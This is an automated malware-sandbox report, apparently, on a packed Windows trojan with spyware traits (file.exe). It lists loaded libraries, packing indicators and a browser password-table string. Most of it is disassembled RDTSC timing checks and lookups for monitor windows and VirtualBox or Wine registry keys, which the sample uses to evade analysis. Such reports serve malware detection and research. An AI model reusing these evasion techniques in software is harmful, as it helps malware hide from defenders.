              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9981081014890282
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2211890707.0000000005911000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199613989.0000000005916000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.00000000058F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211982520.0000000005907000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 36%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 2958848 > 1048576
              Source: file.exeStatic PE information: Raw size of lvdvpuxj is bigger than: 0x100000 < 0x2a6c00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W;lvdvpuxj:EW;foyvnwhq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lvdvpuxj:EW;foyvnwhq:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2dc965 should be: 0x2d83a0
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: lvdvpuxj
              Source: file.exeStatic PE information: section name: foyvnwhq
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_058EDD6D push ss; iretd 0_3_058EDD84
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_058EDD6D push ss; iretd 0_3_058EDD84
              Source: file.exeStatic PE information: section name: entropy: 7.9797333055518855

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEF04 second address: 6FEF1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEF1E second address: 6FEF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87713B second address: 877144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877144 second address: 877150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F92851B8946h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877150 second address: 877156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877156 second address: 877164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877164 second address: 877197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9284AFDC97h 0x0000000b popad 0x0000000c popad 0x0000000d jnl 00007F9284AFDC9Fh 0x00000013 jmp 00007F9284AFDC8Bh 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877197 second address: 87719D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8779E4 second address: 8779F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F9284AFDC86h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8779F2 second address: 8779FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8779FC second address: 877A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877A02 second address: 877A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B055 second address: 87B059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B059 second address: 87B05F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B1F6 second address: 87B1FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B1FC second address: 87B240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F92851B894Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F92851B8959h 0x00000016 pop eax 0x00000017 mov edi, dword ptr [ebp+122D2BBCh] 0x0000001d lea ebx, dword ptr [ebp+1244FFAEh] 0x00000023 stc 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B240 second address: 87B258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B258 second address: 87B25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B25E second address: 87B262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B392 second address: 87B396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B396 second address: 87B39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B481 second address: 87B4C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F92851B8958h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add cx, 0CFFh 0x00000013 push 00000000h 0x00000015 xor edi, dword ptr [ebp+122D3D0Dh] 0x0000001b call 00007F92851B8949h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F92851B894Ch 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4C6 second address: 87B51C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F9284AFDC86h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9284AFDC8Fh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push edx 0x00000019 jns 00007F9284AFDC8Ch 0x0000001f pop edx 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F9284AFDC99h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B51C second address: 87B521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B521 second address: 87B556 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov cl, D0h 0x0000000b push 00000003h 0x0000000d push 00000000h 0x0000000f ja 00007F9284AFDC87h 0x00000015 push 00000003h 0x00000017 mov ecx, dword ptr [ebp+122D3AB5h] 0x0000001d push AB576FC1h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9284AFDC8Fh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B556 second address: 87B55A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A790 second address: 86A79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A79A second address: 86A7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F92851B8946h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A420 second address: 89A428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A74B second address: 89A751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A751 second address: 89A770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F9284AFDC90h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnp 00007F9284AFDC86h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A770 second address: 89A787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A787 second address: 89A78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A78D second address: 89A797 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F92851B8946h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AA2B second address: 89AA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AE60 second address: 89AE6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F92851B8946h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AE6B second address: 89AE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85EB0F second address: 85EB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B2B5 second address: 89B2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B2BB second address: 89B2FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8955h 0x00000007 jmp 00007F92851B8959h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F92851B894Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B2FE second address: 89B302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B890 second address: 89B896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BB56 second address: 89BB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BB5C second address: 89BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BB60 second address: 89BB80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BB80 second address: 89BBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jc 00007F92851B894Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jo 00007F92851B894Ch 0x0000001a jo 00007F92851B8946h 0x00000020 jmp 00007F92851B894Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BBB3 second address: 89BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BCC5 second address: 89BCD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F92851B8946h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C035 second address: 89C03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EF14 second address: 89EF19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D71A second address: 89D71E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D71E second address: 89D724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D724 second address: 89D72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F0EF second address: 89F0F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F0F4 second address: 89F111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9284AFDC8Dh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6483 second address: 8A6490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F92851B8952h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6490 second address: 8A649A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A649A second address: 8A64A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A64A0 second address: 8A64A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A64A6 second address: 8A64AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8924AB second address: 8924AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B0A second address: 8A5B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B8959h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B2C second address: 8A5B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B32 second address: 8A5B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B36 second address: 8A5B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B3A second address: 8A5B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B48 second address: 8A5B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B4C second address: 8A5B52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B52 second address: 8A5B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9284AFDC91h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B71 second address: 8A5B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CD7 second address: 8A5CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
